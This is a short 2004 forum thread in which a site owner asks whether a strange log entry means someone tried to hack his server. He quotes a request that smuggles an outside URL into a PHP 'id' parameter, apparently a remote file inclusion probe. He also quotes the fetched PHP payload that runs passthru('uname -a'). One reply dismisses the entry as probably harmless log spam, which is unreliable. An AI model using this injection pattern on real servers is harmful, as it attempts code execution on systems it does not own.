Has someone been trying to hack me?

Forum Moderators: coopster

Message Too Old, No Replies

Has someone been trying to hack me?

passthru("uname -a")

d_fused

4:59 pm on Jun 27, 2004 (gmt 0)

I was looking at the my log files today and found a strange entry:

[1] ww*w.foo.com/somefile.php?id=http://www.someurl.com

Normally, the url is htaccess overwritten to look like:

[2] ww*.foo.com/somethingelse-1.html

instead of

[3] ww*w.foo.com/somefile.php?id=1

visiting ww*w.someurl.com reveals the following code:

<? echo "\nbl3" . 'bl3 ' ; passthru("uname -a") ;?>

Has someone been trying to hack my sevrer?

Your input is much appreciated.

Regards

jatar_k

5:20 pm on Jun 27, 2004 (gmt 0)

the log entry doesnèt really worry me

ww*w.foo.com/somefile.php?id=http://www.someurl.com

was there a referer for the IP that requested that?

d_fused

5:36 pm on Jun 27, 2004 (gmt 0)

Thanks for the prompt reply, Jatar.

was there a referer for the IP that requested that?

No, there wasn't a referer for this entry and when clicked on the url, an error message came up. (since there is no such record in my database matching the request.

however, I have no idea what is happening on the other end.

jatar_k

5:56 pm on Jun 27, 2004 (gmt 0)

you can do a search for "uname man pages" to see what it's all about.

Maybe they are just log spamming and wanting to insert their url into your logs as a link.

Either way, I don't think it is a big deal.

lamoose

7:05 pm on Jun 27, 2004 (gmt 0)

What are you using to track server activity? Want to install a good tracking service on my server.